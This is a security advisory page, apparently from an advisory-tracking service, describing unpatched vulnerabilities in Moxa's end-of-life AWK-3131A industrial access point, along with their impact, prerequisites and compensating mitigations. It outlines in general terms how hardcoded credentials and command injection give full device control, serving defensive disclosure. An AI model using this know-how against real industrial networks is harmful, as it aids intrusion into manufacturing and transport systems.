Moxa AWK-3131A Series Industrial AP/Bridge/Client Vulnerabilities

Plan Patch10awk-3131a-series-industrial-ap-bridge-client-vulnerabilitiesJun 25, 2024

Summary

The Moxa AWK-3131A industrial access point series contains multiple critical vulnerabilities across all firmware versions: improper access control (CVE-2019-5136) allows low-privilege authenticated users to escalate to higher privileges; hardcoded cryptographic keys (CVE-2019-5137) enable decryption of captured network traffic; hardcoded credentials (CVE-2019-5139) provide direct administrative access; and multiple command injection flaws (CVE-2019-5138, CVE-2019-5140, CVE-2019-5141, CVE-2019-5142) allow authenticated attackers to execute arbitrary OS commands. A buffer overflow (CVE-2019-5143) may also be exploitable. Moxa has stated no firmware patch will be released for this end-of-life product line.

What this means

What could happen

An attacker with low-privilege access to an AWK-3131A device could escalate privileges, inject arbitrary commands to gain full control of the access point, decrypt network traffic using hardcoded keys, or leverage hardcoded credentials to bypass authentication entirely. This could allow an attacker to redirect traffic, intercept communications, or disable wireless connectivity in manufacturing or transportation networks.

Who's at risk

Manufacturing plants and transportation facilities that rely on Moxa AWK-3131A wireless access points for PLC communication, sensor networks, or vehicle telemetry should be concerned. Any facility using this device for industrial Ethernet bridging or client connections is at risk. Secondary concern: managed service providers or integrators who deployed these devices for customers.

How it could be exploited

An attacker with network access to the AWK-3131A's management interface or web interface can authenticate with default or low-privilege credentials, then exploit command injection flaws (CWE-78) to execute arbitrary OS commands with elevated privileges. Alternatively, captured encrypted traffic can be decrypted using the hardcoded cryptographic key, or hardcoded credentials can be extracted and used to gain direct administrative access.

Prerequisites

Network access to AWK-3131A management or web interface (typically port 80/443 or SSH port 22)
Low-privilege user credentials or default credentials
Knowledge of the hardcoded cryptographic key or credentials (publicly disclosed)

no patch availableremotely exploitablelow complexity exploitationhardcoded credentialshardcoded cryptographic keydefault credentialscommand injectionprivilege escalationCVSS 10 (critical)

Exploitability

Moderate exploit probability (EPSS 5.8%)

Affected products (1)

ProductAffected VersionsFix Status

AWK-3131AAll versionsNo fix (EOL)

Remediation & Mitigation

0/4

Do now

0/2

WORKAROUNDIf replacement is not immediately feasible, segment the AWK-3131A onto an isolated management VLAN with strict firewall rules allowing only trusted engineering workstations; block all other network access

WORKAROUNDIf the device must accept remote management, enforce VPN or jump-box access and disable direct web/SSH access from the plant network

Schedule — requires maintenance window

0/1

Patching may require device reboot — plan for process interruption

HARDENINGMonitor the AWK-3131A for unusual command execution, traffic pattern changes, or failed authentication attempts

Mitigations - no patch available

0/1

AWK-3131A has reached End of Life. The vendor will not release a patch. Apply the following compensating controls:

HARDENINGDo not deploy AWK-3131A devices in environments requiring high-security wireless access; consider replacement with a current-generation industrial access point from Moxa or a competitor with active security support

CVEs (12)

CVE-2019-5136 CVE-2019-5137 CVE-2019-5138 CVE-2019-5139 CVE-2019-5140 CVE-2019-5141 CVE-2019-5142 CVE-2019-5143 CVE-2019-5148 CVE-2019-5153 CVE-2019-5162 CVE-2019-5165

View full Moxa Security advisory

↑↓ Navigate · Esc Close

API: /api/v1/advisories/fa685a58-5dca-46b7-a101-8456eaf21d0e